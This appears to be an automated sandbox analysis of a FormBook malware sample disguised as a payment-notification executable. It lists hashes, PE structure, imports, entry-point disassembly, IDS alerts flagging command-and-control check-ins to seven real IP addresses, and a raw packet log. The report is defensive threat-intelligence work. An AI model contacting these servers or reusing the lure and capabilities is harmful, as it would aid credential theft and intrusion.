Preview:	.....S2SZ...P...{.UM...x4E...DS2SZWW0YBO63G1UNIN4P7MIEDDS2S.WW0W].83.8.o.Ox...!,7d#@<=%6]y!.X](Eu,,nF%Ym +d..as783UwOB<.G1UNIN4)6D.x$#..3=.jP>.U....5).T...q)".^...f70..+,^.'V.NIN4P7MI..DS~R[W.X..O63G1UNI.4R6FHNDDC6SZWW0YBO6.R1UNYN4P.IIED.S2CZWW2YBI63G1UNIH4P7MIEDDs6SZUW0YBO61Gq.NI^4P'MIEDTS2CZWW0YB_63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO6.3T-:IN4.8IIETDS2C^WW YBO63G1UNIN4P7mIE$DS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0YBO63G1UNIN4P7MIEDDS2SZWW0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.398731706118184
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment Notification Confirmation 010_01_2025.exe
File size:	1'578'496 bytes
MD5:	f6f599bea1bdf13254eae957f1128fa7
SHA1:	260edf43d09957d6fafc40d6691ec8da5e273789
SHA256:	e767eb4506326ba491c2302df16656569c61fa21df995fe6c35c3c1f38b5584d
SHA512:	0339e8d11fb6abf2ba5a30ba54d8aae0af8dd705fd706cc85ff135229be01d3a098e8098e82440830e0c5b85fcb2601fcfb84a3116070b9253272302401633ed
SSDEEP:	49152:RTvC/MTQYxsWR7amzZzjcN0TTamExiuL7:NjTQYxsWR/zjCmEYu
TLSH:	F375D00273C1C062FF9B91734B5AF6515BBC69260123E62F139819BEBE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x678110BB [Fri Jan 10 12:21:15 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F03C11609F3h
jmp 00007F03C11602FFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F03C11604DDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F03C11604AAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F03C116309Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F03C11630E8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F03C11630D1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xaabb4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x17f000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xaabb4	0xaac00	af1e9c024fa365d9a9b8160383c72b35	False	0.9618926153001464	data	7.9600693852889375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x17f000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0xa1e7a	data			1.0003181726335344
RT_GROUP_ICON	0x17e634	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x17e6ac	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x17e6c0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x17e6d4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x17e6e8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x17e7c4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T09:26:42.307404+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49839	154.215.72.110	80	TCP
2025-01-13T09:27:14.474533+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49979	116.50.37.244	80	TCP
2025-01-13T09:28:36.016917+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49983	85.159.66.93	80	TCP
2025-01-13T09:28:49.369267+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49987	91.195.240.94	80	TCP
2025-01-13T09:29:10.893031+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49991	66.29.149.46	80	TCP
2025-01-13T09:29:24.437117+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49995	195.110.124.133	80	TCP
2025-01-13T09:29:54.438503+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49999	217.196.55.202	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 09:26:41.413985014 CET	49839	80	192.168.2.7	154.215.72.110
Jan 13, 2025 09:26:41.418931007 CET	80	49839	154.215.72.110	192.168.2.7
Jan 13, 2025 09:26:41.419038057 CET	49839	80	192.168.2.7	154.215.72.110
Jan 13, 2025 09:26:41.421354055 CET	49839	80	192.168.2.7	154.215.72.110
Jan 13, 2025 09:26:41.426170111 CET	80	49839	154.215.72.110	192.168.2.7
Jan 13, 2025 09:26:42.307173014 CET	80	49839	154.215.72.110	192.168.2.7
Jan 13, 2025 09:26:42.307348013 CET	80	49839	154.215.72.110	192.168.2.7
Jan 13, 2025 09:26:42.307404041 CET	49839	80	192.168.2.7	154.215.72.110
Jan 13, 2025 09:26:42.310622931 CET	49839	80	192.168.2.7	154.215.72.110
Jan 13, 2025 09:26:42.315395117 CET	80	49839	154.215.72.110	192.168.2.7
Jan 13, 2025 09:27:05.828802109 CET	49975	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:05.833657980 CET	80	49975	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:05.833848953 CET	49975	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:05.835652113 CET	49975	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:05.840486050 CET	80	49975	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:06.716149092 CET	80	49975	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:06.716203928 CET	80	49975	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:06.716283083 CET	49975	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:07.338035107 CET	49975	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:08.356350899 CET	49977	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:08.361536026 CET	80	49977	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:08.361619949 CET	49977	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:08.363504887 CET	49977	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:08.368417978 CET	80	49977	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:09.260838985 CET	80	49977	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:09.260870934 CET	80	49977	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:09.260935068 CET	49977	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:09.869427919 CET	49977	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:10.888231039 CET	49978	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:10.894084930 CET	80	49978	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:10.894232988 CET	49978	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:10.896178007 CET	49978	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:10.903064966 CET	80	49978	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:10.903096914 CET	80	49978	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:11.781835079 CET	80	49978	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:11.781930923 CET	80	49978	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:11.782033920 CET	49978	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:12.400595903 CET	49978	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:13.419850111 CET	49979	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:13.424835920 CET	80	49979	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:13.424951077 CET	49979	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:13.427493095 CET	49979	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:13.432329893 CET	80	49979	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:14.474200964 CET	80	49979	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:14.474245071 CET	80	49979	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:14.474253893 CET	80	49979	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:14.474533081 CET	49979	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:14.477276087 CET	49979	80	192.168.2.7	116.50.37.244
Jan 13, 2025 09:27:14.482083082 CET	80	49979	116.50.37.244	192.168.2.7
Jan 13, 2025 09:27:27.712038994 CET	49980	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:27.716907978 CET	80	49980	85.159.66.93	192.168.2.7
Jan 13, 2025 09:27:27.716990948 CET	49980	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:27.719454050 CET	49980	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:27.724244118 CET	80	49980	85.159.66.93	192.168.2.7
Jan 13, 2025 09:27:29.228950024 CET	49980	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:29.233958960 CET	80	49980	85.159.66.93	192.168.2.7
Jan 13, 2025 09:27:29.234054089 CET	49980	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:30.248298883 CET	49981	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:30.253108978 CET	80	49981	85.159.66.93	192.168.2.7
Jan 13, 2025 09:27:30.253207922 CET	49981	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:30.255682945 CET	49981	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:30.260552883 CET	80	49981	85.159.66.93	192.168.2.7
Jan 13, 2025 09:27:31.760406971 CET	49981	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:31.817399979 CET	80	49981	85.159.66.93	192.168.2.7
Jan 13, 2025 09:27:31.817529917 CET	49981	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:32.779512882 CET	49982	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:32.784394026 CET	80	49982	85.159.66.93	192.168.2.7
Jan 13, 2025 09:27:32.784504890 CET	49982	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:32.790982008 CET	49982	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:32.795840979 CET	80	49982	85.159.66.93	192.168.2.7
Jan 13, 2025 09:27:32.796004057 CET	80	49982	85.159.66.93	192.168.2.7
Jan 13, 2025 09:27:34.307748079 CET	49982	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:34.314368010 CET	80	49982	85.159.66.93	192.168.2.7
Jan 13, 2025 09:27:34.314414024 CET	49982	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:35.325562954 CET	49983	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:35.330473900 CET	80	49983	85.159.66.93	192.168.2.7
Jan 13, 2025 09:27:35.330553055 CET	49983	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:35.332473993 CET	49983	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:27:35.337340117 CET	80	49983	85.159.66.93	192.168.2.7
Jan 13, 2025 09:28:36.016645908 CET	80	49983	85.159.66.93	192.168.2.7
Jan 13, 2025 09:28:36.016690969 CET	80	49983	85.159.66.93	192.168.2.7
Jan 13, 2025 09:28:36.016916990 CET	49983	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:28:36.019584894 CET	49983	80	192.168.2.7	85.159.66.93
Jan 13, 2025 09:28:36.024485111 CET	80	49983	85.159.66.93	192.168.2.7
Jan 13, 2025 09:28:41.088825941 CET	49984	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:41.093689919 CET	80	49984	91.195.240.94	192.168.2.7
Jan 13, 2025 09:28:41.093764067 CET	49984	80	192.168.2.7	91.195.240.94
Jan 13, 2025 09:28:41.096118927 CET	49984	80	192.168.2.7	91.195.240.94
